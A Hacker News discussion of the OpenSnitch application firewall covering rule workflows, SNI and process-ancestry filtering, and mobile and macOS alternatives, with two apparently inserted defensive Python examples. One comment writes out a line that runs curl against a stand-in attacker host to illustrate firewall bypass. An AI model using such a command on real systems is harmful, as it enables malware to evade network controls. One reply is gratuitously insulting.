OpenSnitch is a GNU/Linux interactive application firewall (github.com/evilsocket)
408 points by dp-hackernews 31 days ago | hide | past | favorite | 101 comments



I've tried to use it extensively (as an interactive firewall). However, there are just some problems (that are not the fault of OpenSnitch) that I'm not even sure are solvable.

For example, suppose I run `curl` on the terminal. I can either always decide on a case-by-case basis to allow it through, or I'm required to whitelist it permanently. Once I've whitelisted generic tools like `curl` or `wget`, then the floodgates are really open, since any malware that has compromised my machine can just use `curl` or `wget` to get to the internet without hitting the firewall.


I’ve found that by using subdomain wildcards and/or subnets, I build up a stable set of rules pretty quickly and then only have to review requests to new endpoints once in awhile.

To me, the peace of mind knowing that I’ll be prompted to allow new access is worth the initial hassle. And once the habit is built, it’s pretty easy to manage.

Editing to add: I also use expiring rules regularly. Maybe I trust an installer and want to let it do its thing. So I open it up with a rule for the executable expiring in the near future (options include: forever, until reboot, for the next 30s, for the next 5 mins, etc). This can drastically simplify some tasks if there are a large number of endpoints for some reason and avoids leaving a hole open permanently.


IMO - requires a ton of work. Adoption requires updating rules quite often


Sounds like that varies widely by person/use case. I’ve been using this software for a couple years at this point. I don’t have to update rules all that often (usually a few rules/week), and when I do, it’s usually a 10-30 second detour. The only time it takes more work is if I don’t know why something is trying to connect. But that’s exactly the scenario I’m targeting, i.e. calling attention to the weird looking connections.

My use cases are general productivity, development on side projects and a variety of software experiments, gaming, and some local AI stuff.

I also don’t see this as a ton of work. Rules are 99% pre-configured for you and all you have to do is choose the scope and duration of the rule and whether to reject or allow.

I’ll admit it’s annoying once in awhile if there’s a major update to software that spawns a bunch of new rules, but once I get past the feeling of being annoyed, it’s really an extremely simple and quick process.

Really have to emphasize the habit creation part. After I stuck with it for a few weeks, it became second nature and I stopped getting annoyed for the most part. I consider this a worthwhile habit to build if you’re trying lots of code/libraries and want to know what’s phoning where.


A few rules per week sounds like a lot. I think I am not paranoid enough to micromanage my connections like this.


In terms of time spent, that amounts to about one minute per week for me right now. Sometimes less.

The user experience is streamlined, and adding rules involves responding to a dialog that automatically pops up when a connection is attempted. UX is key here and this would be a very different story if you had to go into a separate rule management interface every time.

Regarding paranoia, I don’t see it that way. Supply chain attacks are alive and well, and if you’re running other people’s code on a regular basis, this is a low cost precautionary measure. I totally recognize that not everyone has the same risk profile or tolerance.


Generally I don't get many prompts day to day; if I do, it's because something has changed or I'm using a new application, and I find it comforting to know what's going on.

You can make rules based on host, process arguments, etc., so it's pretty flexible for allowing stuff you consider safe and staying out of the way.

Long ago I used ZoneAlarm on Windows and it's a pretty similar UX to that.

I still use firejail or docker for anything that might be sketchy, but it's been super interesting seeing what trusted applications are doing. For example I was a bit shocked that the gnome calculator app was making network requests but it turned out it was for currency exchange rates.


I have found it makes me less paranoid, which is good.

In using it for a while, I have only found a few pieces of software trying to access places I don't expect and don't approve of (quite a few more that I do expect, but don't approve of). And none of them seemed to be actively malicious, just misbehaved or poorly configured.


  > I don’t have to update rules all that often (usually a few rules/week)
I think that we have different definitions of "all that often". Even twice a week would be too often for me.


Genuinely curious: how/why does that seem too often? I truly don’t understand. Have you seen the user experience and what’s involved?

How do you feel about other common permission prompts, e.g. location, microphone, camera, share your screen, run as privileged user, etc? I appreciate being asked about those things and I put this in a similar category.


  > Genuinely curious: how/why does that seem too often?
I want to work, not manage my work station.

I don't mind configuring things, my dotfiles are the product of 25 years of tweaking. But having to tweak anything multiple times per day is not going to help me work, it is going to hinder my work.


I highly recommend you look at the UX before drawing any conclusions in that case, because what you’re describing does not resemble the OpenSnitch UX.

The experience is much closer to the other common permission prompts I mentioned which is why I asked how you feel about them.

As a fellow multi-decade dotfile tweaker, that experience isn’t comparable and is not a good model for judging this tool.


OK, thanks, I'll give it a shot then. Thank you for insisting ))


Worth a shot! The first few days are by far the worst while all of the existing connections are accounted for, but things calm down quickly.

One thing I wished I knew sooner was that the square [+] button on the rule dialog opens more fields on the form for editing.

This makes it super easy to create a single wildcard rule e.g. when timesyncd tries to hit an ntp server for the first time, I expand the autogenerated rule that pops up to include all subdomains like *.ntp.domain.tld so I don’t have to keep creating rules for the other ntp servers. I’ve gotten more efficient over time this way.


Great, thanks, noted.


Might be the same, but what if you allow all curl/wget traffic for a 'dev' user, but continue to flag any traffic for the 'normal' user?

For dev work, run 'su -c curl … dev'.

But if a malicious program in the normal user's space is running, then the app firewall flags curl and wget use appropriately.

It would be annoying to input a password every time, so maybe set up PAM to use a YubiKey or biometrics? Also make sure this user cannot log in and does not have a password.


The dev user might be the one you want to protect the best in order to detect some supply chain issues.


This sounds rather silly. If this is really a concern, then "curl" or "wget" can be renamed. I use an application level firewall on mobile and I do not "whitelist" names of programs, I "whitelist" access to certain domain names/IP addresses by certain programs.

The easiest way to stop programs/malware from phoning home IME is to deny access to DNS. I have been doing this for decades and it still works flawlessly. "99%" of the time programs/malware that phone home rely on DNS, not "hard-coded" IP addresses. And it is quite easy for me to detect the rare case of a program/malware that does not need DNS.

With DNS I "whitelist" certain domain names. In fact today I do not even use a locally-served zone file with the IP addresses I need (the whitelist); a forward proxy handles the domain to IP address mapping, the whitelist loaded by the proxy is a text file, like a zone file but simpler.


I wonder if there's a way to configure it so that when the parent cmd is a trusted command (say, a bash/zsh owned by the user), it could let the curl command through and otherwise block it. But yeah, that seems like a bit of a hassle.


Then any process can do `system("bash -c curl malware.attacker")`


The bash command line wouldn't be the same as the one launched by your terminal, though. But yes, I’m sure there are myriad exploits around something like that.


What could work instead is something where you run a command like `opensnitch-context dev` and it would talk to the running daemon to do proper authentication ("do you want to allow this context to be used?") and then hopefully some other magic (cgroups?) to know if the processes are part of that context even if they are sparse/nested child processes.


samlinnfer wrote:

> However there are just some problems (that are not the fault of OpenSnitch) that I'm not even sure that are even solvable.

Those problems are solvable. Some "big" EDRs, which happen to work in a similar way, allow declaring the parent/child relationship of the executables to block, i.e. it should be possible to declare that if "curl" is spawned, and if by walking the parent list we encounter a process called "/usr/bin/trusted", then allow this curl invocation. This would allow running "curl" from bash scripts, as long as the bash script has "/usr/bin/trusted" as a parent.


You'd need a firewall that is not just TCP/UDP-aware, but HTTP(S)-aware, and a way for your firewall to sniff on TLS-encrypted traffic.


Or be ok with filtering HTTP/TLS traffic based on the domain only, as that part isn't encrypted (the SNI [Server Name Indication]). OpenSnitch should be able to allow/disallow based on that, rather than having to decrypt the TLS part.


Unless it’s using Encrypted SNI.

https://www.cloudflare.com/en-gb/learning/ssl/what-is-encryp...

Or, also, not using SNI at all.

But still, you can probably correlate DNS requests with connections to IP addresses in many cases. Although if the program uses DNS over HTTPS (DoH), like several programs do now, then the DNS record is also not known.
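The SNI-based filtering described in the two comments above, as an added example that is not OpenSnitch's own code: it pulls the cleartext server_name out of a TLS ClientHello, flags the two cases where that name cannot be relied on (no SNI at all, or Encrypted Client Hello, where the visible name is only a public cover name), and applies a host rule with the same `*.domain.tld` wildcard shape mentioned earlier in the thread. The ClientHello builder constructs test input; no real traffic is involved.

```python
import struct
from typing import List, Optional, Tuple

TLS_HANDSHAKE = 0x16       # TLS record content type: handshake
CLIENT_HELLO = 0x01        # handshake message type: ClientHello
EXT_SERVER_NAME = 0x0000   # server_name extension (RFC 6066)
EXT_ECH = 0xFE0D           # encrypted_client_hello extension (draft-ietf-tls-esni)

def _u16(buf: bytes, off: int) -> int: return struct.unpack_from("!H", buf, off)[0]

def _extensions(record: bytes) -> List[Tuple[int, bytes]]:
    """Return [(type, data), ...] of a ClientHello record; [] if not one or malformed."""
    exts: List[Tuple[int, bytes]] = []
    try:
        if len(record) < 9 or record[0] != TLS_HANDSHAKE or record[5] != CLIENT_HELLO:
            return exts
        body = record[9:9 + int.from_bytes(record[6:9], "big")]
        off = 2 + 32                  # client_version + random
        off += 1 + body[off]          # legacy_session_id
        off += 2 + _u16(body, off)    # cipher_suites
        off += 1 + body[off]          # compression_methods
        if off + 2 > len(body):       # no extensions block at all
            return exts
        end = off + 2 + _u16(body, off)
        off += 2
        while off + 4 <= end:
            etype, elen = _u16(body, off), _u16(body, off + 2)
            exts.append((etype, body[off + 4:off + 4 + elen]))
            off += 4 + elen
    except (IndexError, struct.error):
        return []                     # truncated input: nothing usable is visible
    return exts

def extract_sni(record: bytes) -> Optional[str]:
    """Return the cleartext host_name from the server_name extension, or None."""
    for etype, data in _extensions(record):
        if etype != EXT_SERVER_NAME:
            continue
        pos = 2                       # skip the ServerNameList length
        while pos + 3 <= len(data):
            ntype, nlen = data[pos], _u16(data, pos + 1)
            if ntype == 0:            # NameType host_name
                return data[pos + 3:pos + 3 + nlen].decode("ascii", "replace")
            pos += 3 + nlen
    return None

def classify(record: bytes) -> Tuple[str, Optional[str]]:
    """What a host rule can see: ('sni', name), ('ech', cover name) or ('no-sni', None)."""
    name = extract_sni(record)
    if any(etype == EXT_ECH for etype, _ in _extensions(record)):
        return ("ech", name)          # real destination is in the encrypted inner hello
    return ("sni", name) if name is not None else ("no-sni", None)

def _host_matches(pattern: str, host: str) -> bool:
    """'*.ntp.example.org' matches any subdomain; anything else is an exact match."""
    return host.endswith(pattern[1:]) if pattern.startswith("*.") else host == pattern

def verdict(record: bytes, allowed_patterns: List[str]) -> str:
    """'allow'/'deny' on a visible SNI; 'ask' when no reliable name is visible."""
    kind, name = classify(record)
    if kind != "sni":
        return "ask"
    return "allow" if any(_host_matches(p, name) for p in allowed_patterns) else "deny"

def build_client_hello(sni: Optional[str] = None, extra_exts: bytes = b"") -> bytes:
    """Constructed minimal ClientHello record for testing (not captured traffic)."""
    exts = b""
    if sni is not None:
        name = sni.encode("ascii")
        entry = b"\x00" + struct.pack("!H", len(name)) + name     # host_name entry
        snl = struct.pack("!H", len(entry)) + entry                 # ServerNameList
        exts += struct.pack("!HH", EXT_SERVER_NAME, len(snl)) + snl
    exts += extra_exts
    body = (b"\x03\x03" + bytes(32)     # client_version TLS 1.2 + 32-byte random
            + b"\x00"                    # empty legacy_session_id
            + b"\x00\x02\x13\x01"        # one cipher suite: TLS_AES_128_GCM_SHA256
            + b"\x01\x00")               # one compression method: null
    if exts:
        body += struct.pack("!H", len(exts)) + exts
    hs = bytes([CLIENT_HELLO]) + len(body).to_bytes(3, "big") + body
    return bytes([TLS_HANDSHAKE, 0x03, 0x01]) + struct.pack("!H", len(hs)) + hs
```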


A sudo-like wrapper for this could be pretty cool.

It will still capture when processes unexpectedly try to connect to the network for the first time, and there is some value in that, even if the popups aren't great.


I'm early in my Linux journey. Would it be a good approach to symlink bash to some new name, say, snitch, then do

   snitch -c "curl blah.blah"
Is there a better way without writing code?


The solution that worked for me was to switch to Qubes OS, where everything runs in VMs with strong hardware-assisted isolation.


I switched from Qubes OS to Fedora+Flatpak+OpenSnitch. Couldn't get Wayland to run on my hybrid GPU system (Nvidia). Qubes OS drained the battery very quickly, and since graphics is afaik software rendered, I ran into problems watching HD videos (e.g. a lot of dropped frames on YouTube).


> graphics is afaik software rendered

Yes, this is accurate (for security reasons). However you still should not have serious problems with Youtube: https://forum.qubes-os.org/t/hd-video-playback-on-qubes-os-o... (see also a few next posts).

How to fix it if you do have problems: https://forum.qubes-os.org/t/improve-video-playback-performa...

Why did you need Wayland on Qubes?


I meant Wayland on Fedora for better application isolation.


You can install an unrestricted version with a new name and alias wget and curl to that in interactive shells.


It doesn’t pin to PID? What if I rename a program to something that has been whitelisted?


Kiboneu wrote:

> It doesn’t pin to PID? What if I rename a program to something that has been whitelisted?

That's a valid question. It should allow/disallow executables by hashing the executable file (not even the device id + inode), not by comparing the paths. Also, pinning the PID isn't good either, since the PID is temporary.
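The two ideas raised above, identifying a binary by its hash rather than its path (this comment) and allowing it only when a trusted process is found by walking the parent chain (the EDR comparison earlier in the thread), as an added example that is not OpenSnitch's code. The lookup is injected so the logic runs offline against a constructed process table; `proc_lookup` is the equivalent backend reading a real Linux /proc. Hashes, paths and PIDs in the table are constructed stand-ins.

```python
import hashlib
import os
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional

@dataclass
class ProcInfo:
    pid: int
    ppid: int
    exe: str          # resolved executable path: informational only, never matched on
    exe_sha256: str   # identity actually used for matching

@dataclass
class Rule:
    exe_sha256: str                         # binary allowed to connect
    trusted_parent_sha256: Optional[str]    # must appear somewhere up the ancestry, or None

Lookup = Callable[[int], Optional[ProcInfo]]   # pid -> ProcInfo (None if gone/unreadable)

def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

def proc_lookup(pid: int) -> Optional[ProcInfo]:
    """Real backend: PPid from /proc/<pid>/status and the exe link (Linux, needs read access)."""
    try:
        with open(f"/proc/{pid}/status") as f:
            ppid = next(int(line.split()[1]) for line in f if line.startswith("PPid:"))
        exe = os.readlink(f"/proc/{pid}/exe")
        return ProcInfo(pid, ppid, exe, sha256_file(exe))
    except (OSError, StopIteration, ValueError):
        return None

def trusted_ancestor(pid: int, trusted_sha256: str, lookup: Lookup, max_depth: int = 64) -> Optional[int]:
    """Walk up from pid's parent; return the first ancestor whose binary hashes to trusted_sha256."""
    me = lookup(pid)
    cur = lookup(me.ppid) if me else None
    seen = set()
    while cur is not None and cur.pid not in seen and len(seen) < max_depth:
        if cur.exe_sha256 == trusted_sha256:
            return cur.pid
        seen.add(cur.pid)
        if cur.ppid in (0, cur.pid):      # reached init / the kernel
            return None
        cur = lookup(cur.ppid)
    return None

def decide(pid: int, rules: List[Rule], lookup: Lookup) -> str:
    """'allow' if a rule matches the binary hash and its ancestry requirement, else 'ask'."""
    proc = lookup(pid)                    # pid is only a handle for the lookup, not the identity
    if proc is None:
        return "ask"
    for rule in rules:
        if rule.exe_sha256 != proc.exe_sha256:
            continue                      # path may say "curl"; only the hash counts
        if rule.trusted_parent_sha256 is None:
            return "allow"
        if trusted_ancestor(pid, rule.trusted_parent_sha256, lookup) is not None:
            return "allow"
    return "ask"

# Constructed process table for an offline demonstration (hashes are stand-ins).
def _h(label: str) -> str:
    return hashlib.sha256(b"constructed:" + label.encode()).hexdigest()

H_INIT, H_BASH, H_CURL, H_AGENT = _h("init"), _h("bash"), _h("curl"), _h("agent")
SAMPLE_TABLE: Dict[int, ProcInfo] = {
    1:   ProcInfo(1, 0, "/sbin/init", H_INIT),
    100: ProcInfo(100, 1, "/usr/bin/bash", H_BASH),       # the user's interactive shell
    200: ProcInfo(200, 100, "/usr/bin/curl", H_CURL),     # curl typed at that shell
    300: ProcInfo(300, 1, "/opt/agent/agent", H_AGENT),   # some unrelated daemon
    301: ProcInfo(301, 300, "/usr/bin/curl", H_CURL),     # real curl spawned by the daemon
    302: ProcInfo(302, 100, "/home/u/bin/curl", H_AGENT), # another binary renamed to "curl"
}
SAMPLE_RULES = [Rule(exe_sha256=H_CURL, trusted_parent_sha256=H_BASH)]

def sample_decisions() -> Dict[int, str]:
    return {pid: decide(pid, SAMPLE_RULES, SAMPLE_TABLE.get) for pid in (200, 301, 302)}
```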


Including the path? If you can do that, there's bigger problems than the outgoing network communications.


I wish OpenSnitch had a temporary allow feature for things like:

- allow a specific parent structure, e.g. when the python interpreter is invoked by a different parent command

- allow a specific process ID temporarily until the process is killed (both with allowing/disallowing child processes)

- allow a specific target port range for games, and not only a specific port in the rulesets.

...because I feel that 99% of the annoying dialogues could have been avoided with this.


Is the filter configured per user, or is it system-wide? I know you can filter per-user with iptables and whatever the newer one is, but I haven't dug that deep into OpenSnitch. Maybe a single trusted user account without a login that you could su into? I wonder if you could also whitelist a VM process and spin up single-use VM sandboxes to use when you want to do a bunch of work like that.

Definitely a minor hassle to set up compared to just saying yes or no to permissions, but it's not complicated, if it works.


so don't do that. problem solved


This is what finally got me over to NixOS. In the past when I've used application firewalls, it's a lot of setup that often breaks on updates changing paths, or I have to redo it all whenever I move to a new computer. Just tons and tons of churn and wasted effort.

By integrating with the package manager, that hasn't been an issue. Once I got through the initial work of setting up my whitelists, I just have a little bit of effort each time I add a new package to my nix configs. If I don't want to take on the effort of adding a whitelist to my nix config, I can just add a temporary whitelist that lasts until the next reboot.

It was a steep learning curve and a lot of work, but now it's a breeze to maintain.


Did you achieve this using the OpenSnitch Nix options over at search.nixos.org/options ?


Yup. My configs can be found here: https://github.com/stusmall/nixos

I tend to put all the random grab-bag rules needed for basic functionality in the opensnitch.nix module. If a package needs rules, it gets a module and they go in there. Check the signal.nix module for a good example.


Very nice, thanks!


This is great for catching sloppy apps that make an excessive number of connections. Thunderbird, I’m looking at you.

I like it, but it has a small annoyance in that the temporary rules that have expired don’t get deleted or marked in the interface. So I have to restart the gui once in a while to clear them.


Not to be that guy, because I never really have the time myself. But, I'm sure PRs are welcome


Actually the new Thunderbird people are not taking lots of patches and fixes for even things like security and mail corruption issues. And privacy definitely doesn't seem to be anything they are interested in. I gave up and just send them over to Betterbird, which is what I use now anyway, since I don't want my mail corrupted.


Have thought about it, though I haven't used Qt in twenty years.


Can recommend it on Fedora over fiddling with firewalld/firewall-config.


How to deal with dnf looking anywhere on the continent each time it wants to update?

https://news.ycombinator.com/item?id=41124755

Could just let it, but would prefer not to.


As was mentioned in the thread you linked, use 'baseurl' instead of 'metalink' in the repo definitions (in /etc/yum.repos.d) and set the update server to whichever mirror you like.

There's even a helpful example in each Fedora repo that you can use as a template.

Good luck.


Yep, there's six or eight of those. I don't think it's reasonable to have to change all of them, and it didn't work when I tried.


My original reply was: I guess it sucks to be you then.

Which isn't very nice or helpful. So I considered mentioning (again) that there are examples that just need to be un-commented and the example url replaced. Which is perhaps a half-dozen keystrokes per file, or maybe a dozen to replace them all at once. As such, if you are, in fact, that lazy, I guess it really does suck to be you.

Hosting your own private mirror[0] is also an option. But then, you'd need a couple dozen more keystrokes (and maybe ten or fifteen minutes of set up), so I'm guessing that's a no go either.

I suppose you could, alternatively, add all the mirrors near you (by your own estimation) to an OpenSnitch allow list and you wouldn't have to change the repo definitions at all. DNF with metalinks will attempt to connect to additional mirrors until it can complete the current request.

That said, I'm guessing setting that up is much more work than deleting, then adding a '#' character (uncomment the baseurl and comment out the metalink) and replacing a URL (the mirror you wish to use).

And since you're that lazy, I imagine that's a no go too.

[This isn't really relevant and I should probably remove it, but I kind of like it there. And you're welcome]

I'd further add that your 'complaint' is an idiotic one at that. So you're lazy and dumb. Good combination friend.

[End not relevant but not deleted text.]

As I mentioned previously, although this time I'm being more expansive in my admonition: Good luck. It seems like you're gonna need it.

[0] https://fedoraproject.org/wiki/Infrastructure/Mirroring#How_...?

Edit: Added some additional thoughts.


The point is that Mint does this with two clicks. Fedora and OpenSnitch are a bad combination due to a poor design and no docs. I was hoping someone would know a trick to get Fedora mirrors under control.

But, I did find you being an ass amusing.



I'd love something sorta like this but for Docker containers running APIs or web services. Like:

containerA: all outbound traffic allowed

containerB: no outbound traffic allowed, except to reply to a client

containerC: may only reach out to updates.example.com

Is this just per-container iptables? I could wedge iptables into existing images but it seems like a lot of work.

Or maybe something with iptables on the host?


Just my two cents that netfilter (for which iptables is a frontend) is a kernel subsystem and therefore global to all containers on the host.


Does something like this exist for my phone, android specifically? Any good recommendations?


There's netguard[1], although most of the convenience features are behind a small payment.

[1] https://netguard.me


I have heard good things about this one. But I think this is one of those no-root firewalls that uses the VPN API, so I figure this means I can't use a VPN at the same time.

An alternative Android root-only option is AFWall+, which allows blocking on LTE, WiFi, LAN, and VPN separately, and script access to iptables. Not sure how actively developed it is, but it seems to work ok.

*edit: Seems to still be active, open source, and available on fdroid too.

https://github.com/ukanth/afwall


Another issue I have with using the VPN in general is that it breaks Android Auto for me.


Netguard is fantastic, although it takes a while to get a safe setup working. I'm blocking traffic by default and get to see all the blocked connection attempts - the extent to which apps transmit data to various parties is depressing. Netguard should be a standard OS feature.


I didn't want to pay without testing the features first, so I rebuilt the app (it is open source) with Pro enabled, so I guess that's an option if you want to avoid payment. Updates are a problem then, though. Once I tested it I gladly paid (more than requested) to support the development. I never got around to reinstalling it though, so I'm still on an older version.

NetGuard is simply awesome. The peace of mind when I know which servers the apps are contacting, and being able to block their access to the net by default, is just great. The rules could be made a bit more easily adjustable (it would be nice if I could block `*.firebaseinstallations.googleapis.com` everywhere, even if other traffic is allowed for the app), but I'm just nitpicking now. Highly recommend it.


"Small payment" is an understatement :)

"You can get all current and future NetGuard pro features (including updates) without Google Play services for the GitHub or F-Droid version by a one time donation of € 0.10 or more. If you donate 7 euros or more, you can activate the pro features on all Android devices you personally own, else you can activate the pro features one time only."


Can confirm that after donating > 7€ I am still able to unlock pro features on new devices 8 years later.


And it is also open source, so you can build and install it yourself. But it is worth it (for me) to pay something to support the developer.


GrapheneOS can at least block internet traffic for specific apps. But can't do it for port ranges or specific domains.


Sadly all real firewalls need root. I was using AFWall+ for a long time; it has neat controls for every app to allow or deny WiFi, Cell or LAN (if you have it). It is an iptables/nftables frontend, so you can customize the rules to your heart's content: https://github.com/ukanth/afwall Works from Android 2+.

Without root only VPN solutions like Adguard are available.

EDIT: if you want neat stats: Glasswire has an Android version. I have only used the beta so I have no idea about its current state. Might be worth checking out though.


ex-AOSP and rethink dns+firewall dev here

> Sadly all real firewalls need root

What do you mean by a "real" firewall? It is very much possible to build a userspace firewall in Android using the VPN APIs.

On Android, ROMs like GrapheneOS, Lineage, and CalyxOS have firewalls built-in.

> Glasswire has an Android version

Note though, Glasswire was recently acquired by another company: https://archive.is/KW2R3


I thought parts of the Android OS can bypass the VPN, so the firewall becomes ineffective at blocking Google, OEMs, and others that have root. Wouldn't the VPN API being used as a firewall also prevent one from using a VPN client at the same time?


For the latter, Rethink can be configured to work with e.g. a WireGuard VPN because it has a built-in WireGuard client.


> Note though, Glasswire was recently acquired by another company

Ah that's why the premium stuff is now free. I was wondering. Let's hope it's not the first sign of enshittification.

> What do you mean by a "real" firewall?

In my experience the "block all non VPN traffic" options in Android don't work reliably. iptables does however.

It's a sad state that you cannot even set a static IPv6 on Android without root.


> In my experience the "block all non VPN traffic" options in Android don't work reliably. iptables does however.

Both (iptables/nftables and VPN APIs) have to be enforced by the Linux Kernel, which is subject to the same "Androidisms", if that makes sense.

Root, in fact, opens up a gaping hole in that it totally compromises Android's security model. IMO, it isn't worth rooting Android just to run iptables (just because it seems like iptables is what makes a firewall).


IMHO Android's security model is incredibly flawed anyway. I don't even need root to access stuff I shouldn't have access to on my Mediatek-based phone because the firmware has tons of gaping security holes anyway.

I think a device you don't have root on isn't really yours and should be treated as a lease.

But you are right, when Wifi/Data is on at boot even the -tables might not get updated fast enough so stuff might get through.


The app "Rethink: DNS + Firewall + VPN" has similar features.


I really like Rethink DNS. I have learned many things from watching it (such as I think Signal is compromised by some five-eyes "crossing the border" fuckery.)


I agree with the first sentence. I cannot even begin to comprehend what semantics you were trying to convey with the second sentence however. I am also lacking all context to be able to understand (compromised in what sense, by whom and to what degree? which border? what is "fuckery" defined as?).

I appreciate you trying to add to the discussion but in this case you leave me with way more questions than I started out with which I personally perceive as an unwanted mental overhead.


Sorry I don't check HN very often these days.

What I mean is by watching the IPs, I see a lot of cross-border ingress/egress when it shouldn't be necessary. It's not proof, but an indicator of probability to me, that echelon style mechanisms are being used.

If you are unaware of Echelon and related programs: essentially, since it's illegal for the US (officially at least) to spy on its own citizens without a warrant, instead they let an "ally" country like the UK spy on Americans and then "share the data", essentially another abuse of the third-party doctrine.

I hope that helps clarify.


> such as I think Signal is compromised by some five-eyes "crossing the border" fuckery

Would you mind elaborating?


TrackerControl is great too. Both are FOSS and can be used in the background for using a custom DNS server and blocking certain categories of domains.


AFWall+

Switched to it from NetGuard mentioned above.


My non-root solution is to use NextDNS or ControlD with "private DNS" (DNS over TLS).

Doesn't stop direct IP connections, but it's good enough.

I also have the CLI installed on OpnSense so DoH is enforced for all devices on my LAN as well.


Would be great to have Arch and OpenSUSE packages too.


There is an official package for Arch Linux. It doesn't ship with the ebpf modules for some reason though (you need to get them separately from AUR).


`opensnitch` is in the extra repository on Arch, and `opensnitch-ebpf-module` exists on the AUR.


How does this compare with something like UFW? Is the main thing a UI to view ongoing activity?


OpenSnitch prompts you when there's network activity. So if a random app makes a telemetry call or something, you get the option to white/greylist that connection with granularity, like OK to make a connection to that address from this executable etc., or always OK to this address, and with duration options like once/for 15 seconds, until reboot etc. Once you get over the hurdle of whitelisting the apps you use and trust, it's actually pretty nice and gives you good insight into what your apps/games are doing that you otherwise wouldn't have known about.


UFW isn't an application firewall, it only blocks/allows port numbers (system-wide), as far as I know.


That's right.


Is there any plan to port this to macOS? I have used Little Snitch (which this is obviously influenced by) for a while, but really prefer open source (for reasons unrelated to payment).


Try LuLu


I have tried to use it off and on many times, but all the random crashes I get really make it very difficult.


Has anyone ever in history had an issue prevented by such a firewall?


Yes. Default-deny application firewalls are a really powerful tool. They really can take the wind out of large classes of exploits. They can't phone home to exfil data or get follow-up commands.

It isn't something I'd recommend for everyone, because it is a lot of work and faffing around, but it can be extremely effective if you are willing to invest in managing it correctly.


Little Snitch, the macOS equivalent to this, was the recommended way to stop pirated copies of Adobe CS programs phoning home for years. Don't think that's the kind of issue you meant, but it does solve it.


Researching every connection is painstaking at first across various operating systems but a tool like this really helps you get familiar with what is normal and what is not.


Is there an open source equivalent for MacOS?


There's Lulu based on Apple's Network Extension framework but there are quite a few issues with the framework itself (it will briefly initiate a connection even though there's a deny rule for that address etc).

https://github.com/objective-see/LuLu


I tried LuLu and it was okay but I did end up trying and subsequently buying Little Snitch. The level of UX polish wasn’t quite there for me with LuLu.


I also feel the same way re: UX polish. I haven't bought little snitch yet, but was kind of wondering if I even needed to. I've already got a pihole on my tailnet that blocks a fair amount of things, and then ublock origin on firefox to boot. If LS were only like $20 I'd probably just buy it for the pleasing graphs, but otherwise I'm not sure what extra value it adds. There's probably a usecase for it given the other things I have, but perhaps I'm not the target audience.


I felt similarly, waited a long time on the trial, and grabbed it on sale for a good bit off retail after I was sure that it met my needs.

